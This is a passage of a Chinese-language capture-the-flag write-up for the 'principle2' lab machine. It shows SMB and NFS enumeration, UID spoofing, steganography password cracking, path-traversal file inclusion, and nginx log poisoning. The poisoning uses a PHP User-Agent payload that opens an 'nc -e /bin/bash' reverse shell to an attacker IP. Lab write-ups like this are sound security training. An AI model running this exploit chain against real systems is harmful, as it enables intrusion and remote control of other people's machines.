smbclient \/\/172.20.10.4\/public<\/code><\/pre>\nsmb: \\> ls\n . D 0 Tue Nov 28 06:57:45 2023\n .. D 0 Sat Nov 25 11:19:40 2023\n new_era.txt N 158 Sun Nov 19 07:01:00 2023\n straton.txt N 718 Sun Nov 19 07:00:24 2023\n loyalty.txt N 931 Sun Nov 19 07:01:07 2023\n\n 19962704 blocks of size 1024. 17193612 blocks available\nsmb: \\> get new_era.txt \ngetting file \\new_era.txt of size 158 as new_era.txt (1.6 KiloBytes\/sec) (average 1.6 KiloBytes\/sec)\nsmb: \\> get straton.txt \ngetting file \\straton.txt of size 718 as straton.txt (6.7 KiloBytes\/sec) (average 4.2 KiloBytes\/sec)\nsmb: \\> get loyalty.txt \ngetting file \\loyalty.txt of size 931 as loyalty.txt (303.1 KiloBytes\/sec) (average 8.5 KiloBytes\/sec)\nsmb: \\> pwd\nCurrent directory is \\\\172.20.10.4\\public\\<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\u8fd9\u51e0\u4e2a\u6587\u4ef6\u7684\u4fe1\u606f\uff1a<\/p>\n
# loyalty.txt\nThis text was the source of considerable controversy in a debate between Byron (7) and Hermanubis (452).\n\nWhat I propose, then, is that we are not born as entirely free agents, responsible only for ourselves. The very core of what we are, our sentience, separates us from and elevates us above the animal kingdom. As I have argued, this is not a matter of arrogance, but of responsibility.\n\n2257686f2061726520796f752c207468656e3f22\n\nTo put it simply: each of us owes a burden of loyalty to humanity itself, to the human project across time and space. This is not a minor matter, or some abstract issue for philosophers. It is a profound and significant part of every human life. It is a universal source of meaning and insight that can bind us together and set us on a path for a brighter future; and it is also a division, a line that must held against those who preach the gospel of self-annihilation. We ignore it at our peril.\n\n# cat new_era.txt \nYesterday there was a big change, new government, new mayor. All citizens were reassigned their tasks. For security, every user should change their password.\n\n# cat straton.txt\nThis fragment from Straton's On the Universe appears to have been of great significance both to the Progenitor and to the Founder.\n\nAMYNTAS: But what does this tell us about the nature of the universe, which is what we were discussing?\nSTRATON: That is the next question we must undertake to answer. We begin with the self because that is what determines our existence as individuals; but the self cannot exist without that which surrounds it. The citizen lives within the city; and the city lives within the cosmos. So now we must apply the principle we have discovered to the wider world, and ask: if man is like a machine, could it be that the universe is similar in nature? And if so, what follows from that fact?<\/code><\/pre>\n\u9664\u4e86\u90a3\u4e00\u4e32\u5b57\u7b26\uff0c\u4f3c\u4e4e\u5bf9\u6211\u4eec\u7684\u6253\u9776\u6ca1\u6709\u5565\u7528\u5904\uff0c\u57fa\u672c\u90fd\u662f\u54f2\u5b66\u89c2\u5ff5\uff0c\u4e0d\u8fc7\u5148\u8bb0\u4f4f\u4ed6\u4eec\u5927\u6982\u8bf4\u7684\u662f\u5565\u5427\u3002<\/p>\n
NFS<\/h4>\n
\u53ef\u4ee5\u770b\u5230\u8fd8\u5f00\u542f\u4e86NFS\u670d\u52a1\uff0c\u5c1d\u8bd5\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
showmount -e 172.20.10.4\n\nExport list for 172.20.10.4:\n\/var\/backups *\n\/home\/byron *<\/code><\/pre>\n\u521b\u5efa\u4e24\u4e2a\u6587\u4ef6\u5939\uff0c\u7136\u540e\u6302\u8f7d\u5230\u672c\u5730\uff1a<\/p>\n
mount -t nfs 172.20.10.4:\/var\/backups \/home\/kali\/temp\/principle2\/backups\nmount -t nfs 172.20.10.4:\/home\/byron \/home\/kali\/temp\/principle2\/byron<\/code><\/pre>\n\u770b\u4e00\u4e0b\u6709\u5565\uff1a<\/p>\n
chmod: changing permissions of 'backups': Read-only file system\ncd: permission denied: backups<\/code><\/pre>\n# mayor.txt \nNow that I am mayor, I think Hermanubis is conspiring against me, I guess he has a secret group and is hiding it.\n# memory.txt \nHermanubis told me that he lost his password and couldn't change it, thank goodness I keep a record of each neighbor with their number and password in hexadecimal. I think he would be a good mayor of the New Jerusalem.<\/code><\/pre>\n\u4f7f\u752816\u8fdb\u5236\u52a0\u5bc6\u4e86\u5bc6\u7801\uff0c\u67e5\u770b\u4e00\u4e0b\u8fd9\u4e24\u4e2a\u6587\u4ef6\u6240\u6709\u8005\u7684UID\uff1a<\/p>\n
ls -la\ntotal 44\ndrwxr-xr-x 4 kali kali 4096 Apr 3 01:01 .\ndrwxr-xr-x 11 kali kali 4096 Apr 3 00:56 ..\ndrwxr--r-- 2 54 backup 28672 Nov 28 19:00 backups\ndrwxr-xr-x 3 1001 1001 4096 Nov 25 12:33 byron<\/code><\/pre>\n\u521b\u5efa\u5177\u6709\u76f8\u540cUID\u7684\u7528\u6237\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n
useradd -u 54 hack\nuseradd warning: hack's uid 54 outside of the UID_MIN 1000 and UID_MAX 60000 range.<\/code><\/pre>\n\u5207\u6362\u7528\u6237\u8fdb\u884c\u8bbf\u95ee\uff1a<\/p>\n
su hack\nbash\ncd backups\nls<\/code><\/pre>\n<\/div><\/p>\n\u6211\u64e6\uff0c\u770b\u4e00\u4e0b\u5185\u5bb9\uff1a<\/p>\n
<\/div><\/p>\n\u679c\u7136\u90fd\u662f\u5341\u516d\u8fdb\u5236\u7684\u5185\u5bb9\uff0c\u8f93\u5165\u5230\u4e00\u4e2a\u6587\u4ef6\u4e2d\u65b9\u4fbf\u6211\u4eec\u8fdb\u884c\u7834\u8bd1\uff1a<\/p>\n
cat *.txt >> \/tmp\/hex.txt\nsu kali\nmv \/tmp\/hex.txt \/home\/kali\/temp\/principle2\/hex.txt<\/code><\/pre>\n\u5c1d\u8bd5\u7834\u8bd1\u4e00\u4e0b\uff1a<\/p>\n
while read line; do echo "$line" | xxd -ps -r | strings; done < hex.txt<\/code><\/pre>\n\u8fd9\u4e9b\u884c\u5927\u591a\u6570\u662f\u65e0\u610f\u4e49\u7684\uff0c\u53ea\u6709\u4e00\u4e2a\uff1a<\/p>\n
.......\nByronIsAsshole\n.......<\/code><\/pre>\n\u8fd9\u5c31\u662f\u5bc6\u7801\u4e86\uff0c\u53ef\u60dc\u6ca1\u6709\u5f00\u653e22\u7aef\u53e3\uff0c\u4e0d\u7136\u76f4\u63a5ssh\u8fde\u63a5\u4e86\uff0c\u91cd\u65b0\u8fde\u63a5smb\u670d\u52a1\uff1a<\/p>\n
smbmap -H 172.20.10.4 -u hermanubis -p ByronIsAsshole<\/code><\/pre>\n[+] IP: 172.20.10.4:445 Name: 172.20.10.4 Status: Authenticated\n Disk Permissions Comment\n ---- ----------- -------\n public READ ONLY New Jerusalem Public\n hermanubis READ ONLY Hermanubis share\n IPC$ NO ACCESS IPC Service (Samba 4.17.12-Debian)<\/code><\/pre>\n\u8bfb\u53d6\u4e00\u4e0b\uff1a<\/p>\n
smbclient \/\/172.20.10.4\/hermanubis -U hermanubis\nPassword for [WORKGROUP\\hermanubis]:\nTry "help" to get a list of possible commands.\nsmb: \\> ls\n . D 0 Tue Nov 28 09:44:44 2023\n .. D 0 Tue Nov 28 20:13:50 2023\n index.html N 346 Tue Nov 28 09:44:41 2023\n prometheus.jpg N 307344 Tue Nov 28 12:23:24 2023\n\n 19962704 blocks of size 1024. 17193608 blocks available\nsmb: \\> get index.html \ngetting file \\index.html of size 346 as index.html (13.0 KiloBytes\/sec) (average 13.0 KiloBytes\/sec)\nsmb: \\> get prometheus.jpg \ngetting file \\prometheus.jpg of size 307344 as prometheus.jpg (10719.3 KiloBytes\/sec) (average 5564.4 KiloBytes\/sec)<\/code><\/pre>\n\u7206\u7834\u9690\u85cf\u5185\u5bb9<\/h4>\n
\u770b\u770b\u4ec0\u4e48\u9b3c\uff1a<\/p>\n
<!DOCTYPE html>\n<html lang="es">\n<head>\n <meta charset="UTF-8">\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <title>Welcome to the resistance forum<\/title>\n<\/head>\n<body>\n <h1>Welcome to the resistance forum<\/h1>\n <p>free our chains!<\/p>\n <img src="prometheus.jpg" alt="chained">\n<\/body>\n<\/html><\/code><\/pre>\n<\/div><\/p>\n\u62ff\u53bb\u770b\u770b\u6709\u6ca1\u6709\u5305\u542b\u5565\u6587\u4ef6\uff1a<\/p>\n
steghide extract -sf prometheus.jpg \nEnter passphrase: \nsteghide: could not extract any data with that passphrase!<\/code><\/pre>\n\u6709\u5bc6\u7801\u770b\u6765\u662f\u9700\u8981\u8fdb\u884c\u63d0\u53d6\u7684\u3002\u3002\u3002<\/p>\n
stegseek -wl \/usr\/share\/wordlists\/rockyou.txt prometheus.jpg<\/code><\/pre>\nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Found passphrase: "soldierofanubis" \n[i] Original filename: "secret.txt".\n[i] Extracting to "prometheus.jpg.out".<\/code><\/pre>\n\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
cat prometheus.jpg.out \nI have set up a website to dismantle all the lies they tell us about the city: thetruthoftalos.hmv<\/code><\/pre>\n\u6dfb\u52a0dns\u89e3\u6790<\/h3>\n# \/etc\/hosts\n172.20.10.4 thetruthoftalos.hmv<\/code><\/pre>\n\u4fe1\u606f\u641c\u96c6<\/h3>\ncurl http:\/\/thetruthoftalos.hmv\/\nNOTHING<\/code><\/pre>\n\u626b\u63cf\u4e00\u4e0b\uff1a<\/p>\n
dirsearch -u http:\/\/thetruthoftalos.hmv\/<\/code><\/pre>\n[01:47:04] 200 - 2KB - \/index.php\n[01:47:17] 403 - 555B - \/uploads\/\n[01:47:17] 301 - 169B - \/uploads -> http:\/\/thetruthoftalos.hmv\/uploads\/<\/code><\/pre>\nok\uff01\uff01\uff01\u67e5\u770b\u4e00\u4e0b\uff1a<\/p>\n
<\/div><\/p>\nContent of ares.txt:\n\nRoman Name: Mars\n\nAres was the god of war. He was depicted as both cruel and a coward, but greatly feared among the Greek populace for his battle lust and violence. Despite his reputation for violence, Ares was not always respected by the other gods and was often the subject of ridicule and scorn. Ares was the son of Zeus and Hera, but neither of his parents liked him which often made him feel outcast by the Olympians, apart from Aphrodite, with whom he carried on a lengthy affair. His symbols include the vulture and the dog, and he often carried a bloody spear.<\/code><\/pre>\nContent of hermes.txt:\n\nRoman Name: Mercury\n\nHermes was the messenger of the gods, a trickster, and a friend to thieves. He was said to have invented boxing and gymnastics and was the son of Zeus and the constellation Maia. He was often depicted as a young man wearing a winged hat and sandals, and carrying a caduceus: a staff with two snakes coiled around it. Hermes was known for his quick wit, cunning, and ability to move swiftly between the mortal and divine worlds. He was also considered the messenger of the gods, and was responsible for delivering missives and guiding souls to the underworld. In addition, Hermes was associated with luck and good fortune, and was often invoked by merchants and traders for success in their endeavors. Hermes was also known to be one of the most mischievous of the gods, often playing tricks and pranks on other Olympians, demigods like Heracles, and the mere mortals of Greece.<\/code><\/pre>\n\u50cf\u662f\u4e00\u4e2a\u5bfc\u6e38\u9875\u9762\u4e00\u6837\u3002\u770b\u4e00\u4e0burl\uff1a<\/p>\n
http:\/\/thetruthoftalos.hmv\/index.php?filename=hermes.txt<\/code><\/pre>\n\u5c1d\u8bd5\u6587\u4ef6\u5305\u542b\uff1a<\/p>\n
http:\/\/thetruthoftalos.hmv\/index.php?filename=..\/..\/..\/..\/..\/..\/etc\/passwd\nhttp:\/\/thetruthoftalos.hmv\/index.php?filename=....\/\/....\/\/....\/\/....\/\/etc\/passwd<\/code><\/pre>\n\u7b2c\u4e8c\u4e2a\u6210\u529f\u4e86\uff0c\u627e\u51fa\u4e86\u51e0\u4e2a\u7528\u6237\uff1a<\/p>\n
daemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:54:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/run\/ircd:\/usr\/sbin\/nologin\n_apt:x:42:65534::\/nonexistent:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\nsystemd-network:x:998:998:systemd Network Management:\/:\/usr\/sbin\/nologin\nsystemd-timesync:x:997:997:systemd Time Synchronization:\/:\/usr\/sbin\/nologin\nmessagebus:x:100:107::\/nonexistent:\/usr\/sbin\/nologin\nsshd:x:101:65534::\/run\/sshd:\/usr\/sbin\/nologin\ntalos:x:1000:1000:Talos,,,:\/home\/talos:\/bin\/bash\n_rpc:x:102:65534::\/run\/rpcbind:\/usr\/sbin\/nologin\nstatd:x:103:65534::\/var\/lib\/nfs:\/usr\/sbin\/nologin\nbyron:x:1001:1001::\/home\/byron:\/bin\/sh\nhermanubis:x:1002:1002::\/home\/hermanubis:\/bin\/sh\nmelville:x:1003:1003::\/home\/melville:\/bin\/bash<\/code><\/pre>\n\u4f46\u662f\u6ca1\u6709\u4e0a\u4f20\u70b9\uff0c\u627e\u4e00\u4e0b\u65e5\u5fd7\u6587\u4ef6\u7684\u4f4d\u7f6e\uff0c\u770b\u770b\u80fd\u4e0d\u80fd\u8fdb\u884c\u65e5\u5fd7\u5305\u542bgetshell\uff1a<\/p>\n
http:\/\/thetruthoftalos.hmv\/index.php?filename=....\/\/....\/\/....\/\/....\/\/var\/log\/apache\/access.log\nhttp:\/\/thetruthoftalos.hmv\/index.php?filename=....\/\/....\/\/....\/\/....\/\/var\/log\/nginx\/access.log\nhttp:\/\/thetruthoftalos.hmv\/index.php?filename=....\/\/....\/\/....\/\/....\/\/var\/log\/nginx\/error.log<\/code><\/pre>\n\u7b2c\u4e8c\u4e2a\u51fa\u73b0\u4ee5\u4e0b\u60c5\u51b5\uff1a<\/p>\n
<\/div><\/p>\n\u7b2c\u4e09\u4e2a\u53ef\u4ee5\u8bfb\u53d6\u4e86\uff1a<\/p>\n
<\/div><\/p>\n\u6784\u9020payload\uff1a<\/p>\n
curl http:\/\/thetruthoftalos.hmv\/exploit -H "User-Agent: <?php exec('nc -e \/bin\/bash 172.20.10.8 1234') ?>"<\/code><\/pre>\n<html>\n<head><title>404 Not Found<\/title><\/head>\n<body>\n<center><h1>404 Not Found<\/h1><\/center>\n<hr><center>nginx\/1.22.1<\/center>\n<\/body>\n<\/html><\/code><\/pre>\n\u7136\u540e\uff1a<\/p>\n
curl http:\/\/thetruthoftalos.hmv\/index.php?filename=....\/\/....\/\/....\/\/....\/\/\/var\/log\/nginx\/access.log<\/code><\/pre>\n<html>\n<head><title>504 Gateway Time-out<\/title><\/head>\n<body>\n<center><h1>504 Gateway Time-out<\/h1><\/center>\n<hr><center>nginx\/1.22.1<\/center>\n<\/body>\n<\/html><\/code><\/pre>\nshell\u5f39\u56de\u6765\u4e86\uff1a<\/p>\n
<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u5207\u6362\u7528\u6237<\/h3>\n
\u8bb0\u5f97\u6211\u4eec\u4e4b\u524d\u770b\u5230\u7684\/etc\/passwd<\/code>\u4e86\u5417\uff0c\u6211\u4eec\u786e\u5b9e\u6709\u4e86\u4e00\u4e2a\u7528\u6237\uff1a<\/p>\nhermanubis\nByronIsAsshole<\/code><\/pre>\n\u5c1d\u8bd5\u5207\u6362\u4e00\u4e0b\uff1a<\/p>\n
(remote) hermanubis@principle2:\/home\/hermanubis$ whoami;id\nhermanubis\nuid=1002(hermanubis) gid=1002(hermanubis) groups=1002(hermanubis)\n(remote) hermanubis@principle2:\/home\/hermanubis$ ls -la\ntotal 32\ndrwx------ 3 hermanubis hermanubis 4096 Nov 29 01:13 .\ndrwxr-xr-x 7 root root 4096 Nov 25 16:19 ..\nlrwxrwxrwx 1 root root 9 Nov 25 17:34 .bash_history -> \/dev\/null\n-rwx------ 1 hermanubis hermanubis 220 Apr 23 2023 .bash_logout\n-rwx------ 1 hermanubis hermanubis 3526 Apr 23 2023 .bashrc\n-rwx------ 1 hermanubis hermanubis 264 Nov 23 21:18 investigation.txt\n-rwx------ 1 hermanubis hermanubis 807 Apr 23 2023 .profile\ndrwxr-x--- 2 hermanubis hermanubis 4096 Nov 28 14:44 share\n-rwx------ 1 hermanubis hermanubis 1080 Nov 25 17:29 user.txt\n(remote) hermanubis@principle2:\/home\/hermanubis$ cat user.txt\n ...',;;:cccccccc:;,..\n ..,;:cccc::::ccccclloooolc;'.\n .',;:::;;;;:loodxk0kkxxkxxdocccc;;'..\n .,;;;,,;:coxldKNWWWMMMMWNNWWNNKkdolcccc:,.\n .',;;,',;lxo:...dXWMMMMMMMMNkloOXNNNX0koc:coo;.\n ..,;:;,,,:ldl' .kWMMMWXXNWMMMMXd..':d0XWWN0d:;lkd,\n ..,;;,,'':loc. lKMMMNl. .c0KNWNK: ..';lx00X0l,cxo,.\n ..''....'cooc. c0NMMX; .l0XWN0; ,ddx00occl:.\n ..'.. .':odc. .x0KKKkolcld000xc. .cxxxkkdl:,..\n ..''.. ;dxolc;' .lxx000kkxx00kc. .;looolllol:'..\n ..'.. .':lloolc:,.. 'lxkkkkk0kd, ..':clc:::;,,;:;,'..\n ...... ....',;;;:ccc::;;,''',:loddol:,,;:clllolc:;;,'........\n . ....'''',,,;;:cccccclllloooollllccc:c:::;,'..\n .......'',,,,,,,,;;::::ccccc::::;;;,,''...\n ...............''',,,;;;,,''''''......\n ............................\n\nCONGRATULATIONS!\n\nThe flag is:\n&5Wvtd!84S6JSMeH\n(remote) hermanubis@principle2:\/home\/hermanubis$ cat investigation.txt \nI am aware that Byron hates me... especially since I lost my password.\nMy friends along with myself after several analyses and attacks, we have detected that Melville is using a 32 character password....\nWhat he doesn't know is that it is in the Byron database...<\/code><\/pre>\n\u7206\u7834\u7528\u6237Melville<\/h3>\n
\u53c8\u51fa\u73b0\u4e86\u6211\u4eec\u4e4b\u524d\u53d1\u73b0\u7684\u90a3\u4e2a\u5bc6\u7801\u672c\u7684\u5185\u5bb9\uff0c\u4f7f\u7528\u5de5\u5177\u8fdb\u884csu\u7206\u7834\uff1a<\/p>\n
\n
![\"image-20240403124205383\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502131.png\")
<\/div>![\"image-20240403124218677\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502132.png\")
<\/div><\/p>\n![\"image-20240403131108843\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502133.png\")
<\/div><\/p>\n![\"image-20240403131453924\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502134.png\")
<\/div><\/p>\n![\"image-20240403133248650\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502135.png\")
<\/div><\/p>\n![\"image-20240403134804404\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502136.png\")
<\/div><\/p>\n![\"image-20240403135548543\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502137.png\")
<\/div><\/p>\n![\"image-20240403135615024\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502138.png\")
<\/div><\/p>\n![\"image-20240403140237653\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502139.png\")
<\/div><\/p>\n![\"image-20240403142023070\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502140.png\")
<\/div><\/p>\n![\"image-20240403144339392\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502141.png\")
<\/div><\/p>\n![\"image-20240403144539351\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502142.png\")
<\/div><\/p>\n![\"image-20240403145512586\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502143.png\")
<\/div>![\"image-20240403145657641\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502144.png\")
<\/div><\/p>\n![\"image-20240403145806934\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404031502146.png\")
<\/div><\/p>\n